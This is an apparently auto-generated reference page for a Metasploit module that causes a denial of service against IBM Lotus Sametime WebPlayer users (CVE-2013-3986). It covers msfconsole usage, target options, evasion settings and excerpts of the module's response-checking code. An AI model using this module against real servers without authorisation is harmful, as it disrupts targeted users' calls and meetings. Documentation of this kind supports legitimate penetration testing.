IBM Lotus Sametime WebPlayer DoS - Metasploit


This page contains detailed information about how to use the auxiliary/dos/misc/ibm_sametime_webplayer_dos metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: IBM Lotus Sametime WebPlayer DoS
Module: auxiliary/dos/misc/ibm_sametime_webplayer_dos
Source code: modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb
Disclosure date: 2013-11-07
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 5060
List of CVEs: CVE-2013-3986

This module exploits a known flaw in the IBM Lotus Sametime WebPlayer version 8.5.2.1392 (and prior) to cause a denial of service condition against specific users. For this module to function the target user must be actively logged into the IBM Lotus Sametime server and have the Sametime Audio Visual browser plug-in (WebPlayer) loaded as a browser extension. The user should have the WebPlayer plug-in active (i.e. be in a Sametime Audio/Video meeting for this DoS to work correctly.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


msf > use auxiliary/dos/misc/ibm_sametime_webplayer_dos
msf auxiliary(ibm_sametime_webplayer_dos) > show targets
    ... a list of targets ...
msf auxiliary(ibm_sametime_webplayer_dos) > set TARGET target-id
msf auxiliary(ibm_sametime_webplayer_dos) > show options
    ... show and set options ...
msf auxiliary(ibm_sametime_webplayer_dos) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

  • RHOST: The Sametime Media Server

Go back to menu.

Msfconsole Usage


Here is how the dos/misc/ibm_sametime_webplayer_dos auxiliary module looks in the msfconsole:

msf6 > use auxiliary/dos/misc/ibm_sametime_webplayer_dos

msf6 auxiliary(dos/misc/ibm_sametime_webplayer_dos) > show info

       Name: IBM Lotus Sametime WebPlayer DoS
     Module: auxiliary/dos/misc/ibm_sametime_webplayer_dos
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2013-11-07

Provided by:
  Chris John Riley
  kicks4kittens

Available actions:
  Name   Description
  ----   -----------
  CHECK  Checking if targeted user is online
  DOS    Cause a Denial Of Service condition against a connected user

Check supported:
  No

Basic options:
  Name     Current Setting                                      Required  Description
  ----     ---------------                                      --------  -----------
  RHOST                                                         yes       The Sametime Media Server
  RHOSTS                                                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT    5060                                                 yes       The target port (TCP)
  SIPURI   <target_email_address>@<sametime_media_server_FQDN>  yes       The SIP URI of the user to be targeted
  TIMEOUT  0                                                    yes       Set specific response timeout

Description:
  This module exploits a known flaw in the IBM Lotus Sametime 
  WebPlayer version 8.5.2.1392 (and prior) to cause a denial of 
  service condition against specific users. For this module to 
  function the target user must be actively logged into the IBM Lotus 
  Sametime server and have the Sametime Audio Visual browser plug-in 
  (WebPlayer) loaded as a browser extension. The user should have the 
  WebPlayer plug-in active (i.e. be in a Sametime Audio/Video meeting 
  for this DoS to work correctly.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2013-3986
  OSVDB (99552)
  http://www.securityfocus.com/bid/63611
  http://www-01.ibm.com/support/docview.wss?uid=swg21654041
  http://xforce.iss.net/xforce/xfdb/84969

Module Options


This is a complete list of options available in the dos/misc/ibm_sametime_webplayer_dos auxiliary module:

msf6 auxiliary(dos/misc/ibm_sametime_webplayer_dos) > show options

Module options (auxiliary/dos/misc/ibm_sametime_webplayer_dos):

   Name     Current Setting                                      Required  Description
   ----     ---------------                                      --------  -----------
   RHOST                                                         yes       The Sametime Media Server
   RHOSTS                                                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    5060                                                 yes       The target port (TCP)
   SIPURI   <target_email_address>@<sametime_media_server_FQDN>  yes       The SIP URI of the user to be targeted
   TIMEOUT  0                                                    yes       Set specific response timeout

Auxiliary action:

   Name  Description
   ----  -----------
   DOS   Cause a Denial Of Service condition against a connected user

Advanced Options


Here is a complete list of advanced options supported by the dos/misc/ibm_sametime_webplayer_dos auxiliary module:

msf6 auxiliary(dos/misc/ibm_sametime_webplayer_dos) > show advanced

Module advanced options (auxiliary/dos/misc/ibm_sametime_webplayer_dos):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   CHOST                            no        The local client address
   CPORT                            no        The local client port
   ConnectTimeout  10               yes       Maximum number of seconds to establish a TCP connection
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                        no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode   PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion      Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   VERBOSE         false            no        Enable detailed status messages
   WORKSPACE                        no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the dos/misc/ibm_sametime_webplayer_dos module can do:

msf6 auxiliary(dos/misc/ibm_sametime_webplayer_dos) > show actions

Auxiliary actions:

   Name   Description
   ----   -----------
   CHECK  Checking if targeted user is online
   DOS    Cause a Denial Of Service condition against a connected user

Evasion Options


Here is the full list of possible evasion options supported by the dos/misc/ibm_sametime_webplayer_dos auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(dos/misc/ibm_sametime_webplayer_dos) > show evasion

Module evasion options:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   TCP::max_send_size  0                no        Maxiumum tcp segment size.  (0 = disable)
   TCP::send_delay     0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

User is already offline... Exiting...


Here is a relevant code snippet related to the "User is already offline... Exiting..." error message:

94:	    # DOS action
95:	    print_status("Checking if user #{@sipuri} is online")
96:	    check_result = check_user
97:	
98:	    if check_result == false
99:	      print_error("User is already offline... Exiting...")
100:	      return
101:	    end
102:	
103:	    # only proceed if action is DOS the target user is
104:	    # online or the CHECKUSER option has been disabled

User is still online


Here is a relevant code snippet related to the "User is still online" error message:

106:	    dos_result = dos_user
107:	
108:	    if dos_result
109:	      print_good("User is offline, DoS was successful")
110:	    else
111:	      print_error("User is still online")
112:	    end
113:	
114:	  end
115:	
116:	  def dos_user

DoS packet appears successful. Response received (404 Not Found)


Here is a relevant code snippet related to the "DoS packet appears successful. Response received (404 Not Found)" error message:

124:	    elsif res =~ /430 Flow Failed/i
125:	      vprint_good("DoS packet successful. Response received (430 Flow Failed)")
126:	      vprint_good("User #{@sipuri} is no longer responding")
127:	      return true
128:	    elsif res =~ /404 Not Found/i
129:	      vprint_error("DoS packet appears successful. Response received (404 Not Found)")
130:	      vprint_status("User appears to be currently offline or not in a Sametime video session")
131:	      return true
132:	    elsif res =~ /200 OK/i
133:	      vrint_error("#{peer} - DoS packet unsuccessful. Response received (200)")
134:	      vrint_status("#{peer} - Check user is running an effected version of IBM Lotus Sametime WebPlayer")

User appears to be currently offline or not in a Sametime video session


Here is a relevant code snippet related to the "User appears to be currently offline or not in a Sametime video session" error message:

125:	      vprint_good("DoS packet successful. Response received (430 Flow Failed)")
126:	      vprint_good("User #{@sipuri} is no longer responding")
127:	      return true
128:	    elsif res =~ /404 Not Found/i
129:	      vprint_error("DoS packet appears successful. Response received (404 Not Found)")
130:	      vprint_status("User appears to be currently offline or not in a Sametime video session")
131:	      return true
132:	    elsif res =~ /200 OK/i
133:	      vrint_error("#{peer} - DoS packet unsuccessful. Response received (200)")
134:	      vrint_status("#{peer} - Check user is running an effected version of IBM Lotus Sametime WebPlayer")
135:	      return false

<PEER> - DoS packet unsuccessful. Response received (200)


Here is a relevant code snippet related to the "<PEER> - DoS packet unsuccessful. Response received (200)" error message:

128:	    elsif res =~ /404 Not Found/i
129:	      vprint_error("DoS packet appears successful. Response received (404 Not Found)")
130:	      vprint_status("User appears to be currently offline or not in a Sametime video session")
131:	      return true
132:	    elsif res =~ /200 OK/i
133:	      vrint_error("#{peer} - DoS packet unsuccessful. Response received (200)")
134:	      vrint_status("#{peer} - Check user is running an effected version of IBM Lotus Sametime WebPlayer")
135:	      return false
136:	    else
137:	      vprint_status("Unexpected response")
138:	      return true

No response


Here is a relevant code snippet related to the "No response" error message:

145:	    msg = create_message(length)
146:	    res = send_msg(msg)
147:	
148:	    # check response for current user status - common return codes
149:	    if res.nil?
150:	      vprint_error("No response")
151:	      return false
152:	    elsif res =~ /430 Flow Failed/i
153:	      vprint_good("User #{@sipuri} is no longer responding (already DoS'd?)")
154:	      return false
155:	    elsif res =~ /404 Not Found/i

User <SIPURI> is currently offline or not in a Sametime video session


Here is a relevant code snippet related to the "User <SIPURI> is currently offline or not in a Sametime video session" error message:

151:	      return false
152:	    elsif res =~ /430 Flow Failed/i
153:	      vprint_good("User #{@sipuri} is no longer responding (already DoS'd?)")
154:	      return false
155:	    elsif res =~ /404 Not Found/i
156:	      vprint_error("User #{@sipuri} is currently offline or not in a Sametime video session")
157:	      return false
158:	    elsif res =~ /200 OK/i
159:	      vprint_good("User #{@sipuri} is online")
160:	      return true
161:	    else

Unknown server response


Here is a relevant code snippet related to the "Unknown server response" error message:

157:	      return false
158:	    elsif res =~ /200 OK/i
159:	      vprint_good("User #{@sipuri} is online")
160:	      return true
161:	    else
162:	      vprint_error("Unknown server response")
163:	      return false
164:	    end
165:	  end
166:	
167:	  def create_message(length)

Unable to connect


Here is a relevant code snippet related to the "Unable to connect" error message:

210:	        # retry request
211:	        res = timing_get_once(s, 25)
212:	      end
213:	      return res
214:	    rescue ::Rex::ConnectionRefused
215:	      print_status("Unable to connect")
216:	      return nil
217:	    rescue ::Errno::ECONNRESET
218:	      print_good("DoS packet successful, host not responding.")
219:	      return nil
220:	    rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Chris John Riley
  • kicks4kittens

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.